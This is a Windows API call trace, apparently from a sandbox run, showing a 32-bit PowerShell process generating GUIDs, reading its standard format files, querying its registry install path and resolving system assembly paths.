	[0162.802] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xe870cb7f, Data2=0x2bed, Data3=0x4afc, Data4=([0]=0xb9, [1]=0xb5, [2]=0xb5, [3]=0xbb, [4]=0x54, [5]=0x6d, [6]=0x87, [7]=0xac))) returned 0x0
	[0162.803] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x17777115, Data2=0xd388, Data3=0x46ce, Data4=([0]=0xa2, [1]=0xca, [2]=0xf1, [3]=0xb8, [4]=0x18, [5]=0x14, [6]=0x2, [7]=0x9))) returned 0x0
	[0162.803] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1afa2856, Data2=0x8983, Data3=0x4e2e, Data4=([0]=0xbf, [1]=0x8d, [2]=0x1e, [3]=0x68, [4]=0x78, [5]=0xd3, [6]=0x61, [7]=0x73))) returned 0x0
	[0162.803] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x3d460d75, Data2=0x820b, Data3=0x414f, Data4=([0]=0x84, [1]=0x8f, [2]=0x32, [3]=0x5, [4]=0xc1, [5]=0x1, [6]=0x51, [7]=0x9f))) returned 0x0
	[0162.803] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x95a2b9fe, Data2=0x9f88, Data3=0x4882, Data4=([0]=0xbf, [1]=0xc6, [2]=0xf, [3]=0x9b, [4]=0x11, [5]=0x28, [6]=0xea, [7]=0x80))) returned 0x0
	[0162.803] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xcafc4ca7, Data2=0xb7d3, Data3=0x49d2, Data4=([0]=0xba, [1]=0x5c, [2]=0x6c, [3]=0xa6, [4]=0x71, [5]=0xe4, [6]=0x4a, [7]=0x15))) returned 0x0
	[0162.803] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x89cfc606, Data2=0xaff7, Data3=0x4872, Data4=([0]=0x92, [1]=0x19, [2]=0xb2, [3]=0xd8, [4]=0xb2, [5]=0xe1, [6]=0x5, [7]=0x5))) returned 0x0
	[0162.804] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x61c91a72, Data2=0x5d9c, Data3=0x44aa, Data4=([0]=0xbc, [1]=0x7f, [2]=0x2e, [3]=0x39, [4]=0x6e, [5]=0xe2, [6]=0x29, [7]=0x4e))) returned 0x0
	[0162.804] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x30ef578c, Data2=0x5313, Data3=0x4742, Data4=([0]=0x89, [1]=0xd, [2]=0x3c, [3]=0x9d, [4]=0xd1, [5]=0x70, [6]=0xf3, [7]=0xe6))) returned 0x0
	[0162.804] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xbb7a3e5d, Data2=0xd35a, Data3=0x405a, Data4=([0]=0xac, [1]=0x6d, [2]=0x9, [3]=0xe1, [4]=0x43, [5]=0xac, [6]=0xab, [7]=0x93))) returned 0x0
	[0162.804] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xdc59376d, Data2=0xe5d6, Data3=0x4a9d, Data4=([0]=0xb2, [1]=0xff, [2]=0x40, [3]=0x73, [4]=0x90, [5]=0x72, [6]=0xe8, [7]=0xbe))) returned 0x0
	[0162.804] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5f4f8539, Data2=0xa77b, Data3=0x4fe0, Data4=([0]=0xa9, [1]=0x72, [2]=0x96, [3]=0xa0, [4]=0x34, [5]=0x4a, [6]=0x59, [7]=0xe3))) returned 0x0
	[0162.804] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x274fc81a, Data2=0x6adf, Data3=0x4830, Data4=([0]=0xbe, [1]=0x6, [2]=0x81, [3]=0x66, [4]=0x58, [5]=0x1c, [6]=0x5c, [7]=0xb1))) returned 0x0
	[0162.804] VirtualQuery (in: lpAddress=0x10d360, lpBuffer=0x10e360, dwLength=0x1c | out: lpBuffer=0x10e360*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.805] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x6feed895, Data2=0x44e3, Data3=0x488b, Data4=([0]=0xa9, [1]=0xaa, [2]=0x8, [3]=0xd6, [4]=0xee, [5]=0x9d, [6]=0x25, [7]=0xec))) returned 0x0
	[0162.805] VirtualQuery (in: lpAddress=0x10d360, lpBuffer=0x10e360, dwLength=0x1c | out: lpBuffer=0x10e360*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.808] VirtualQuery (in: lpAddress=0x10d360, lpBuffer=0x10e360, dwLength=0x1c | out: lpBuffer=0x10e360*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.811] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xc0fd01bb, Data2=0x34eb, Data3=0x4207, Data4=([0]=0x8b, [1]=0xb4, [2]=0x98, [3]=0x2c, [4]=0xe3, [5]=0x8e, [6]=0x58, [7]=0x1b))) returned 0x0
	[0162.811] VirtualQuery (in: lpAddress=0x10d360, lpBuffer=0x10e360, dwLength=0x1c | out: lpBuffer=0x10e360*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.811] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xdceca2a6, Data2=0xe006, Data3=0x40dc, Data4=([0]=0xbf, [1]=0xd, [2]=0x3f, [3]=0x81, [4]=0xf5, [5]=0xf7, [6]=0x59, [7]=0x62))) returned 0x0
	[0162.812] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xc96077cf, Data2=0xc736, Data3=0x4369, Data4=([0]=0xb4, [1]=0x32, [2]=0xb2, [3]=0x54, [4]=0xa7, [5]=0x50, [6]=0x15, [7]=0xe4))) returned 0x0
	[0162.812] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8f2c3d18, Data2=0xcc6c, Data3=0x4400, Data4=([0]=0x8d, [1]=0x67, [2]=0xd9, [3]=0x92, [4]=0xfe, [5]=0xa9, [6]=0xff, [7]=0xb1))) returned 0x0
	[0162.812] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1c4755b8, Data2=0x3101, Data3=0x468f, Data4=([0]=0x98, [1]=0x59, [2]=0x83, [3]=0xcf, [4]=0x3e, [5]=0x77, [6]=0x72, [7]=0x21))) returned 0x0
	[0162.812] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x88c5f316, Data2=0x5fb9, Data3=0x4107, Data4=([0]=0xb8, [1]=0x80, [2]=0xee, [3]=0xed, [4]=0x71, [5]=0x94, [6]=0xc0, [7]=0xef))) returned 0x0
	[0162.812] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xc350ccaf, Data2=0x2384, Data3=0x496c, Data4=([0]=0x85, [1]=0x36, [2]=0x52, [3]=0x18, [4]=0x91, [5]=0xee, [6]=0x14, [7]=0xf2))) returned 0x0
	[0162.812] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x8e2780b9, Data2=0x18cf, Data3=0x4ae0, Data4=([0]=0xbb, [1]=0xf4, [2]=0x8b, [3]=0xc, [4]=0x3d, [5]=0x98, [6]=0xe8, [7]=0xfd))) returned 0x0
	[0162.812] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x807beab5, Data2=0xe168, Data3=0x48ed, Data4=([0]=0x83, [1]=0x5d, [2]=0xb3, [3]=0xff, [4]=0x39, [5]=0xfd, [6]=0x44, [7]=0x96))) returned 0x0
	[0162.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x218754e2, Data2=0xe964, Data3=0x48a0, Data4=([0]=0x9e, [1]=0x52, [2]=0x69, [3]=0x12, [4]=0xc3, [5]=0x4f, [6]=0xa6, [7]=0x14))) returned 0x0
	[0162.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x47f40ccd, Data2=0x302d, Data3=0x439d, Data4=([0]=0xa1, [1]=0xe4, [2]=0xe5, [3]=0xa0, [4]=0x4c, [5]=0x26, [6]=0x87, [7]=0xe2))) returned 0x0
	[0162.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x1504ec54, Data2=0x90b0, Data3=0x4b28, Data4=([0]=0xbf, [1]=0xc1, [2]=0x62, [3]=0xb9, [4]=0x26, [5]=0xd9, [6]=0xb2, [7]=0x91))) returned 0x0
	[0162.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x537abbd4, Data2=0xa73c, Data3=0x428c, Data4=([0]=0xb4, [1]=0xbf, [2]=0x3f, [3]=0x4a, [4]=0xe6, [5]=0x99, [6]=0x3b, [7]=0x89))) returned 0x0
	[0162.813] VirtualQuery (in: lpAddress=0x10d340, lpBuffer=0x10e340, dwLength=0x1c | out: lpBuffer=0x10e340*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.813] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xd1cb7f7b, Data2=0xace, Data3=0x4ab7, Data4=([0]=0xaf, [1]=0x2e, [2]=0xed, [3]=0x97, [4]=0x66, [5]=0x2c, [6]=0x96, [7]=0xfe))) returned 0x0
	[0162.814] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x5394c0de, Data2=0x6c3d, Data3=0x44c3, Data4=([0]=0xbc, [1]=0x75, [2]=0xdf, [3]=0x6a, [4]=0xcc, [5]=0x8d, [6]=0xf, [7]=0xee))) returned 0x0
	[0162.814] VirtualQuery (in: lpAddress=0x10d368, lpBuffer=0x10e368, dwLength=0x1c | out: lpBuffer=0x10e368*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.814] VirtualQuery (in: lpAddress=0x10d368, lpBuffer=0x10e368, dwLength=0x1c | out: lpBuffer=0x10e368*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.814] VirtualQuery (in: lpAddress=0x10d368, lpBuffer=0x10e368, dwLength=0x1c | out: lpBuffer=0x10e368*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.814] VirtualQuery (in: lpAddress=0x10d368, lpBuffer=0x10e368, dwLength=0x1c | out: lpBuffer=0x10e368*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0162.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0162.814] GetLastError () returned 0x0
	[0162.814] SetErrorMode (uMode=0x1) returned 0x1
	[0162.814] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0162.815] GetLastError () returned 0x0
	[0162.815] GetFileType (hFile=0x348) returned 0x1
	[0162.815] SetErrorMode (uMode=0x1) returned 0x1
	[0162.815] GetFileType (hFile=0x348) returned 0x1
	[0162.815] ReadFile (in: hFile=0x348, lpBuffer=0x2a881d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a881d8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0162.887] GetLastError () returned 0x0
	[0162.887] ReadFile (in: hFile=0x348, lpBuffer=0x2a881d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a881d8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.147] GetLastError () returned 0x0
	[0163.147] ReadFile (in: hFile=0x348, lpBuffer=0x2a881d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a881d8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.147] GetLastError () returned 0x0
	[0163.147] ReadFile (in: hFile=0x348, lpBuffer=0x2a881d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a881d8*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.147] GetLastError () returned 0x0
	[0163.147] ReadFile (in: hFile=0x348, lpBuffer=0x2a881d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a881d8*, lpNumberOfBytesRead=0x10e614*=0x8b4, lpOverlapped=0x0) returned 1
	[0163.148] GetLastError () returned 0x0
	[0163.148] ReadFile (in: hFile=0x348, lpBuffer=0x2a8762c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a8762c*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0163.148] GetLastError () returned 0x0
	[0163.148] ReadFile (in: hFile=0x348, lpBuffer=0x2a881d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2a881d8*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0163.148] GetLastError () returned 0x0
	[0163.148] CloseHandle (hObject=0x348) returned 1
	[0163.432] GetLastError () returned 0x0
	[0163.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.432] GetLastError () returned 0x0
	[0163.432] SetErrorMode (uMode=0x1) returned 0x1
	[0163.432] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2aa91d4 | out: lpFileInformation=0x2aa91d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0163.432] GetLastError () returned 0x0
	[0163.432] SetErrorMode (uMode=0x1) returned 0x1
	[0163.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.432] GetLastError () returned 0x0
	[0163.432] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x348) returned 0x0
	[0163.432] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0163.433] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0163.433] RegCloseKey (hKey=0x348) returned 0x0
	[0163.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.433] GetLastError () returned 0x0
	[0163.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0163.433] GetLastError () returned 0x0
	[0163.433] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xe846bde7, Data2=0xa1c4, Data3=0x4482, Data4=([0]=0xba, [1]=0xda, [2]=0xb7, [3]=0xb7, [4]=0x3a, [5]=0xe7, [6]=0x4d, [7]=0x19))) returned 0x0
	[0163.434] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xed104f2c, Data2=0xa010, Data3=0x4d84, Data4=([0]=0xbd, [1]=0x32, [2]=0xe6, [3]=0x35, [4]=0xff, [5]=0x90, [6]=0xe7, [7]=0x49))) returned 0x0
	[0163.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.434] GetLastError () returned 0x0
	[0163.434] SetErrorMode (uMode=0x1) returned 0x1
	[0163.434] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348
	[0163.434] GetLastError () returned 0x0
	[0163.434] GetFileType (hFile=0x348) returned 0x1
	[0163.434] SetErrorMode (uMode=0x1) returned 0x1
	[0163.434] GetFileType (hFile=0x348) returned 0x1
	[0163.434] ReadFile (in: hFile=0x348, lpBuffer=0x2abf0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abf0e4*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.569] GetLastError () returned 0x0
	[0163.570] ReadFile (in: hFile=0x348, lpBuffer=0x2abf0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abf0e4*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.570] GetLastError () returned 0x0
	[0163.570] ReadFile (in: hFile=0x348, lpBuffer=0x2abf0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abf0e4*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.570] GetLastError () returned 0x0
	[0163.570] ReadFile (in: hFile=0x348, lpBuffer=0x2abf0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abf0e4*, lpNumberOfBytesRead=0x10e614*=0x1000, lpOverlapped=0x0) returned 1
	[0163.570] GetLastError () returned 0x0
	[0163.570] ReadFile (in: hFile=0x348, lpBuffer=0x2abf0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abf0e4*, lpNumberOfBytesRead=0x10e614*=0xe98, lpOverlapped=0x0) returned 1
	[0163.570] GetLastError () returned 0x0
	[0163.570] ReadFile (in: hFile=0x348, lpBuffer=0x2abe71c, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abe71c*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0163.570] GetLastError () returned 0x0
	[0163.570] ReadFile (in: hFile=0x348, lpBuffer=0x2abf0e4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x10e614, lpOverlapped=0x0 | out: lpBuffer=0x2abf0e4*, lpNumberOfBytesRead=0x10e614*=0x0, lpOverlapped=0x0) returned 1
	[0163.570] GetLastError () returned 0x0
	[0163.570] CloseHandle (hObject=0x348) returned 1
	[0163.879] GetLastError () returned 0x0
	[0163.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.879] GetLastError () returned 0x0
	[0163.879] SetErrorMode (uMode=0x1) returned 0x1
	[0163.879] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ae00e0 | out: lpFileInformation=0x2ae00e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0163.879] GetLastError () returned 0x0
	[0163.879] SetErrorMode (uMode=0x1) returned 0x1
	[0163.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.879] GetLastError () returned 0x0
	[0163.879] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10e598 | out: phkResult=0x10e598*=0x348) returned 0x0
	[0163.880] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x0, lpcbData=0x10e5dc*=0x0 | out: lpType=0x10e5e0*=0x1, lpData=0x0, lpcbData=0x10e5dc*=0x56) returned 0x0
	[0163.880] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10e5e0, lpData=0x584bc0, lpcbData=0x10e5dc*=0x56 | out: lpType=0x10e5e0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x10e5dc*=0x56) returned 0x0
	[0163.880] RegCloseKey (hKey=0x348) returned 0x0
	[0163.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.880] GetLastError () returned 0x0
	[0163.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x10e0d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0163.880] GetLastError () returned 0x0
	[0163.880] VirtualQuery (in: lpAddress=0x10d2f0, lpBuffer=0x10e2f0, dwLength=0x1c | out: lpBuffer=0x10e2f0*(BaseAddress=0x10d000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0163.881] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0xb29259e9, Data2=0x66fc, Data3=0x4cf4, Data4=([0]=0xa6, [1]=0x59, [2]=0x63, [3]=0xce, [4]=0xb2, [5]=0xe3, [6]=0xc9, [7]=0xb9))) returned 0x0
	[0163.881] CoCreateGuid (in: pguid=0x10e608 | out: pguid=0x10e608*(Data1=0x7dedecf4, Data2=0x125b, Data3=0x4ea7, Data4=([0]=0xa1, [1]=0xdf, [2]=0x23, [3]=0x3e, [4]=0x6f, [5]=0x64, [6]=0x49, [7]=0x2d))) returned 0x0
	[0163.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0163.914] GetLastError () returned 0x57
	[0163.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0163.914] GetLastError () returned 0x57
	[0164.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.150] GetLastError () returned 0x57
	[0164.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0164.151] GetLastError () returned 0x57
